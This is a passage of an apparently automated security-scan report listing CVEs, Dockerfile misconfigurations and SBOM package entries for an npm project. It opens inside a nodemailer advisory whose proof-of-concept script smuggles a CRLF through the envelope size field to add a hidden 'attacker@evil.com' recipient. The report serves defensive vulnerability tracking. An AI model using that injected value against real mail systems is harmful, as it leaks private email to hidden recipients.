\ = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\n\
const server = net.createServer(socket => {\n socket.write('220 localhost\
\ ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk => {\n \
\ buffer += chunk.toString();\n const lines = buffer.split('\\\
r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n\
\ if (!line) continue;\n console.log('C:', line);\n \
\ if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\\
r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL\
\ FROM')) {\n socket.write('250 OK\\r\\n');\n } else\
\ if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\\
r\\n');\n } else if (line === 'DATA') {\n socket.write('354\
\ Start\\r\\n');\n } else if (line === '.') {\n socket.write('250\
\ OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n \
\ socket.write('221 Bye\\r\\n');\n socket.end();\n \
\ }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n\
\ const port = server.address().port;\n console.log('SMTP server on port',\
\ port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n\
\ const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n\
\ port,\n secure: false,\n tls: { rejectUnauthorized: false\
\ },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n\
\ to: 'recipient@example.com',\n subject: 'Normal email',\n \
\ text: 'This is a normal email.',\n envelope: {\n from:\
\ 'sender@example.com',\n to: ['recipient@example.com'],\n \
\ size: '100\\r\\nRCPT TO:<attacker@evil.com>',\n },\n }, (err)\
\ => {\n if (err) console.error('Error:', err.message);\n console.log('\\\
nExpected output above:');\n console.log(' C: MAIL FROM:<sender@example.com>\
\ SIZE=100');\n console.log(' C: RCPT TO:<attacker@evil.com> \
\ <-- INJECTED');\n console.log(' C: RCPT TO:<recipient@example.com>');\n\
\ server.close();\n transporter.close();\n });\n});\n```\n\n\
**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected\
\ RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM:<sender@example.com> SIZE=100\n\
C: RCPT TO:<attacker@evil.com>\nC: RCPT TO:<recipient@example.com>\nC: DATA\n\
...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:<attacker@evil.com>` line is injected\
\ by the CRLF in the `size` field, silently adding an extra recipient to the\
\ email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An\
\ attacker who can influence the `envelope.size` property in a `sendMail()`\
\ call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected\
\ `RCPT TO` commands, receiving copies of all emails sent through the affected\
\ transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional\
\ `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage\
\ the sending organization's SMTP server reputation** for spam or phishing delivery\n\
\nThe severity is mitigated by the fact that the `envelope` object must be explicitly\
\ provided by the application. Nodemailer's default envelope construction from\
\ message headers does not include `size`. Applications that pass through user-controlled\
\ data to the envelope options (e.g., via API parameters, admin panels, or template\
\ configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current);\
\ likely all versions where `envelope.size` is supported."
Severity: LOW
VendorSeverity:
ghsa: 1
CVSS:
ghsa:
V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
V40Score: 2.3
References:
- https://github.com/nodemailer/nodemailer
- https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651
- https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8
PublishedDate: '2026-03-26T22:26:46Z'
LastModifiedDate: '2026-03-26T22:26:46Z'
context:
sbom:
name: nodemailer
version: 6.10.1
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 6.666666666666666
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 2
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a6ff7b0fa39fdb3f
ruleId: CVE-2026-41305
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of
style closing tags'
title: CVE-2026-41305
description: PostCSS takes a CSS file and provides an API to analyze and modify
its rules by transforming the rules into an Abstract Syntax Tree. Versions prior
to 8.5.10 do not escape `</style>` sequences when stringifying CSS ASTs. When
user-submitted CSS is parsed and re-stringified for embedding in HTML `<style>`
tags, `</style>` in CSS values breaks out of the style context, enabling XSS.
Version 8.5.10 fixes the issue.
remediation: https://avd.aquasec.com/nvd/cve-2026-41305
references: []
tags:
- vulnerability
- pkg:postcss@8.4.31
risk:
cwe: &id050
- CWE-79
raw:
VulnerabilityID: CVE-2026-41305
VendorIDs:
- GHSA-qx2v-qp2m-jg93
PkgID: postcss@8.4.31
PkgName: postcss
PkgIdentifier:
PURL: pkg:npm/postcss@8.4.31
UID: d845910d063cee9a
InstalledVersion: 8.4.31
FixedVersion: 8.5.10
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-41305
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:0086ad0890ab40dce9aff6b30459bf2f3c009f942faa4825d50709ee67cab3d6
Title: 'postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of
style closing tags'
Description: PostCSS takes a CSS file and provides an API to analyze and modify
its rules by transforming the rules into an Abstract Syntax Tree. Versions prior
to 8.5.10 do not escape `</style>` sequences when stringifying CSS ASTs. When
user-submitted CSS is parsed and re-stringified for embedding in HTML `<style>`
tags, `</style>` in CSS values breaks out of the style context, enabling XSS.
Version 8.5.10 fixes the issue.
Severity: MEDIUM
CweIDs: *id050
VendorSeverity:
ghsa: 2
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
V3Score: 6.1
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
V3Score: 6.1
References:
- https://access.redhat.com/security/cve/CVE-2026-41305
- https://github.com/postcss/postcss
- https://github.com/postcss/postcss/releases/tag/8.5.10
- https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93
- https://nvd.nist.gov/vuln/detail/CVE-2026-41305
- https://www.cve.org/CVERecord?id=CVE-2026-41305
PublishedDate: '2026-04-24T03:16:11.547Z'
LastModifiedDate: '2026-04-24T17:16:21.5Z'
context:
sbom:
name: postcss
version: 8.4.31
path: /package-lock.json
compliance:
owaspTop10_2021:
- A03:2021
cweTop25_2024:
- id: CWE-79
rank: 1
category: Injection
cisControlsV8_1: *id010
nistCsf2_0:
- *id041
- *id011
- *id012
pciDss4_0:
- *id042
- *id013
- *id014
mitreAttack:
- *id043
- *id015
priority:
priority: 13.349866666666665
epss: 0.00031
epss_percentile: 0.09168
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00124
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 62517a0411bc2994
ruleId: CVE-2026-45740
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'protobufjs: Denial of Service via unbounded recursive JSON descriptor
expansion'
title: CVE-2026-45740
description: protobufjs compiles protobuf definitions into JavaScript (JS) functions.
Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while
expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON().
A crafted JSON descriptor with deeply nested namespace definitions could cause
the JavaScript call stack to be exhausted during descriptor loading. This vulnerability
is fixed in 7.5.8 and 8.2.0.
remediation: https://avd.aquasec.com/nvd/cve-2026-45740
references: []
tags:
- vulnerability
- pkg:protobufjs@7.5.6
risk:
cwe: &id051
- CWE-674
raw:
VulnerabilityID: CVE-2026-45740
VendorIDs:
- GHSA-jggg-4jg4-v7c6
PkgID: protobufjs@7.5.6
PkgName: protobufjs
PkgIdentifier:
PURL: pkg:npm/protobufjs@7.5.6
UID: 11481e02f6a2a6cd
InstalledVersion: 7.5.6
FixedVersion: 7.5.8, 8.2.0
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-45740
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:0c7c535ab3a0329218c83c03c24db05aed8e9bc3de59ef7112b23085b7c52d89
Title: 'protobufjs: Denial of Service via unbounded recursive JSON descriptor
expansion'
Description: protobufjs compiles protobuf definitions into JavaScript (JS) functions.
Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while
expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON().
A crafted JSON descriptor with deeply nested namespace definitions could cause
the JavaScript call stack to be exhausted during descriptor loading. This vulnerability
is fixed in 7.5.8 and 8.2.0.
Severity: MEDIUM
CweIDs: *id051
VendorSeverity:
ghsa: 2
nvd: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
V3Score: 5.3
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://github.com/protobufjs/protobuf.js
- https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-jggg-4jg4-v7c6
- https://nvd.nist.gov/vuln/detail/CVE-2026-45740
PublishedDate: '2026-05-13T16:17:00.52Z'
LastModifiedDate: '2026-05-13T20:50:15.587Z'
context:
sbom:
name: protobufjs
version: 7.5.6
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.36426666666667
epss: 0.00058
epss_percentile: 0.1822
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00232
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4aee8c6d135a7c0c
ruleId: CVE-2026-45736
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: ws is an open source WebSocket client and server for Node.js. Prior to
...
title: CVE-2026-45736
description: ws is an open source WebSocket client and server for Node.js. Prior
to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized
memory disclosure when a TypedArray is passed as the reason argument. This vulnerability
is fixed in 8.20.1.
remediation: https://avd.aquasec.com/nvd/cve-2026-45736
references: []
tags:
- vulnerability
- pkg:ws@8.18.3
risk:
cwe: &id052
- CWE-908
raw:
VulnerabilityID: CVE-2026-45736
VendorIDs:
- GHSA-58qx-3vcg-4xpx
PkgID: ws@8.18.3
PkgName: ws
PkgIdentifier:
PURL: pkg:npm/ws@8.18.3
UID: f8dc386179443300
InstalledVersion: 8.18.3
FixedVersion: 8.20.1
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-45736
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:54b51dc0dfb29c3a34ed11a3c1a3c26e8c1546c9a2c83cff9b3d42b63d290b98
Title: ws is an open source WebSocket client and server for Node.js. Prior to
...
Description: ws is an open source WebSocket client and server for Node.js. Prior
to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized
memory disclosure when a TypedArray is passed as the reason argument. This vulnerability
is fixed in 8.20.1.
Severity: MEDIUM
CweIDs: *id052
VendorSeverity:
ghsa: 2
nvd: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N
V3Score: 4.4
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
V3Score: 7.5
References:
- https://github.com/websockets/ws
- https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086
- https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx
- https://nvd.nist.gov/vuln/detail/CVE-2026-45736
PublishedDate: '2026-05-15T15:16:54.103Z'
LastModifiedDate: '2026-05-19T14:39:20.353Z'
context:
sbom:
name: ws
version: 8.18.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.338133333333333
epss: 9.0e-05
epss_percentile: 0.00961
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00036
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: eba667be954e5b93
ruleId: Image user should not be 'root'
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: Dockerfile.dev
startLine: 0
message: Image user should not be 'root'
title: Image user should not be 'root'
description: Running containers with 'root' user can lead to a container escape
situation. It is a best practice to run containers as non-root users, which can
be done by adding a 'USER' statement to the Dockerfile.
remediation: https://avd.aquasec.com/misconfig/ds-0002
references: []
tags:
- misconfig
raw:
Type: Dockerfile Security Check
ID: DS-0002
Title: Image user should not be 'root'
Description: Running containers with 'root' user can lead to a container escape
situation. It is a best practice to run containers as non-root users, which
can be done by adding a 'USER' statement to the Dockerfile.
Message: Specify at least 1 USER command in Dockerfile with non-root user as argument
Namespace: builtin.dockerfile.DS002
Query: data.builtin.dockerfile.DS002.deny
Resolution: Add 'USER <non root user name>' line to the Dockerfile
Severity: HIGH
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002
References:
- https://docs.docker.com/develop/develop-images/dockerfile_best-practices/
- https://avd.aquasec.com/misconfig/ds-0002
Status: FAIL
CauseMetadata:
Provider: Dockerfile
Service: general
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.333333333333336
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 63eaab178df076b0
ruleId: No HEALTHCHECK defined
severity: LOW
tool:
name: trivy
version: unknown
location:
path: Dockerfile.dev
startLine: 0
message: No HEALTHCHECK defined
title: No HEALTHCHECK defined
description: You should add HEALTHCHECK instruction in your docker container images
to perform the health check on running containers.
remediation: https://avd.aquasec.com/misconfig/ds-0026
references: []
tags:
- misconfig
raw:
Type: Dockerfile Security Check
ID: DS-0026
Title: No HEALTHCHECK defined
Description: You should add HEALTHCHECK instruction in your docker container images
to perform the health check on running containers.
Message: Add HEALTHCHECK instruction in your Dockerfile
Namespace: builtin.dockerfile.DS026
Query: data.builtin.dockerfile.DS026.deny
Resolution: Add HEALTHCHECK instruction in Dockerfile
Severity: LOW
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026
References:
- https://blog.aquasec.com/docker-security-best-practices
- https://avd.aquasec.com/misconfig/ds-0026
Status: FAIL
CauseMetadata:
Provider: Dockerfile
Service: general
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 6.666666666666666
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 2
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e68d0bbfcfdade0c
ruleId: Image user should not be 'root'
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: Dockerfile.production
startLine: 0
message: Image user should not be 'root'
title: Image user should not be 'root'
description: Running containers with 'root' user can lead to a container escape
situation. It is a best practice to run containers as non-root users, which can
be done by adding a 'USER' statement to the Dockerfile.
remediation: https://avd.aquasec.com/misconfig/ds-0002
references: []
tags:
- misconfig
raw:
Type: Dockerfile Security Check
ID: DS-0002
Title: Image user should not be 'root'
Description: Running containers with 'root' user can lead to a container escape
situation. It is a best practice to run containers as non-root users, which
can be done by adding a 'USER' statement to the Dockerfile.
Message: Specify at least 1 USER command in Dockerfile with non-root user as argument
Namespace: builtin.dockerfile.DS002
Query: data.builtin.dockerfile.DS002.deny
Resolution: Add 'USER <non root user name>' line to the Dockerfile
Severity: HIGH
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002
References:
- https://docs.docker.com/develop/develop-images/dockerfile_best-practices/
- https://avd.aquasec.com/misconfig/ds-0002
Status: FAIL
CauseMetadata:
Provider: Dockerfile
Service: general
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.333333333333336
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7b29c0ae384e49f6
ruleId: No HEALTHCHECK defined
severity: LOW
tool:
name: trivy
version: unknown
location:
path: Dockerfile.production
startLine: 0
message: No HEALTHCHECK defined
title: No HEALTHCHECK defined
description: You should add HEALTHCHECK instruction in your docker container images
to perform the health check on running containers.
remediation: https://avd.aquasec.com/misconfig/ds-0026
references: []
tags:
- misconfig
raw:
Type: Dockerfile Security Check
ID: DS-0026
Title: No HEALTHCHECK defined
Description: You should add HEALTHCHECK instruction in your docker container images
to perform the health check on running containers.
Message: Add HEALTHCHECK instruction in your Dockerfile
Namespace: builtin.dockerfile.DS026
Query: data.builtin.dockerfile.DS026.deny
Resolution: Add HEALTHCHECK instruction in Dockerfile
Severity: LOW
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026
References:
- https://blog.aquasec.com/docker-security-best-practices
- https://avd.aquasec.com/misconfig/ds-0026
Status: FAIL
CauseMetadata:
Provider: Dockerfile
Service: general
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 6.666666666666666
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 2
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c5cf815654ece26c
ruleId: Image user should not be 'root'
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: Dockerfile.test
startLine: 0
message: Image user should not be 'root'
title: Image user should not be 'root'
description: Running containers with 'root' user can lead to a container escape
situation. It is a best practice to run containers as non-root users, which can
be done by adding a 'USER' statement to the Dockerfile.
remediation: https://avd.aquasec.com/misconfig/ds-0002
references: []
tags:
- misconfig
raw:
Type: Dockerfile Security Check
ID: DS-0002
Title: Image user should not be 'root'
Description: Running containers with 'root' user can lead to a container escape
situation. It is a best practice to run containers as non-root users, which
can be done by adding a 'USER' statement to the Dockerfile.
Message: Specify at least 1 USER command in Dockerfile with non-root user as argument
Namespace: builtin.dockerfile.DS002
Query: data.builtin.dockerfile.DS002.deny
Resolution: Add 'USER <non root user name>' line to the Dockerfile
Severity: HIGH
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0002
References:
- https://docs.docker.com/develop/develop-images/dockerfile_best-practices/
- https://avd.aquasec.com/misconfig/ds-0002
Status: FAIL
CauseMetadata:
Provider: Dockerfile
Service: general
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.333333333333336
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 09a592ef82d0362e
ruleId: No HEALTHCHECK defined
severity: LOW
tool:
name: trivy
version: unknown
location:
path: Dockerfile.test
startLine: 0
message: No HEALTHCHECK defined
title: No HEALTHCHECK defined
description: You should add HEALTHCHECK instruction in your docker container images
to perform the health check on running containers.
remediation: https://avd.aquasec.com/misconfig/ds-0026
references: []
tags:
- misconfig
raw:
Type: Dockerfile Security Check
ID: DS-0026
Title: No HEALTHCHECK defined
Description: You should add HEALTHCHECK instruction in your docker container images
to perform the health check on running containers.
Message: Add HEALTHCHECK instruction in your Dockerfile
Namespace: builtin.dockerfile.DS026
Query: data.builtin.dockerfile.DS026.deny
Resolution: Add HEALTHCHECK instruction in Dockerfile
Severity: LOW
PrimaryURL: https://avd.aquasec.com/misconfig/ds-0026
References:
- https://blog.aquasec.com/docker-security-best-practices
- https://avd.aquasec.com/misconfig/ds-0026
Status: FAIL
CauseMetadata:
Provider: Dockerfile
Service: general
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 6.666666666666666
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 2
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 18edd79c677235d0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @alloc/quick-lru 5.2.0'
title: '@alloc/quick-lru 5.2.0'
description: 'Package discovered: @alloc/quick-lru 5.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 47af215a45bf2740
name: '@alloc/quick-lru'
version: 5.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@alloc\/quick-lru:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@alloc\/quick-lru:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@alloc\/quick_lru:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@alloc\/quick_lru:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@alloc\/quick:\@alloc\/quick-lru:5.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@alloc\/quick:\@alloc\/quick_lru:5.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40alloc/quick-lru@5.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@alloc/quick-lru/-/quick-lru-5.2.0.tgz
integrity: sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 44b56e7441c56f19
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @babel/runtime 7.29.2'
title: '@babel/runtime 7.29.2'
description: 'Package discovered: @babel/runtime 7.29.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 77d76c145d8ae8f1
name: '@babel/runtime'
version: 7.29.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@babel\/runtime:\@babel\/runtime:7.29.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40babel/runtime@7.29.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@babel/runtime/-/runtime-7.29.2.tgz
integrity: sha512-JiDShH45zKHWyGe4ZNVRrCjBz8Nh9TMmZG1kh4QTK8hCBTWBi8Da+i7s1fJw7/lYpM4ccepSNfqzZ/QvABBi5g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 87ac29aa779666c3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @emnapi/runtime 1.10.0'
title: '@emnapi/runtime 1.10.0'
description: 'Package discovered: @emnapi/runtime 1.10.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 90f3b7ad1f28a06b
name: '@emnapi/runtime'
version: 1.10.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@emnapi\/runtime:\@emnapi\/runtime:1.10.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40emnapi/runtime@1.10.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.10.0.tgz
integrity: sha512-ewvYlk86xUoGI0zQRNq/mC+16R1QeDlKQy21Ki3oSYXNgLb45GV1P6A0M+/s6nyCuNDqe5VpaY84BzXGwVbwFA==
dependencies:
tslib: ^2.4.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9dddf13ce7ce2b19
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @fastify/busboy 3.2.0'
title: '@fastify/busboy 3.2.0'
description: 'Package discovered: @fastify/busboy 3.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c1858ce75e8e8799
name: '@fastify/busboy'
version: 3.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@fastify\/busboy:\@fastify\/busboy:3.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40fastify/busboy@3.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@fastify/busboy/-/busboy-3.2.0.tgz
integrity: sha512-m9FVDXU3GT2ITSe0UaMA5rU3QkfC/UXtCU8y0gSN/GugTqtVldOBWIB5V6V3sbmenVZUIpU6f+mPEO2+m5iTaA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 81749876eac20ae8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @firebase/app-check-interop-types 0.3.2'
title: '@firebase/app-check-interop-types 0.3.2'
description: 'Package discovered: @firebase/app-check-interop-types 0.3.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 71780c9abc78bb02
name: '@firebase/app-check-interop-types'
version: 0.3.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@firebase\/app-check-interop-types:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app-check-interop-types:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app_check_interop_types:\@firebase\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@firebase\/app_check_interop_types:\@firebase\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*
source: syft-generated
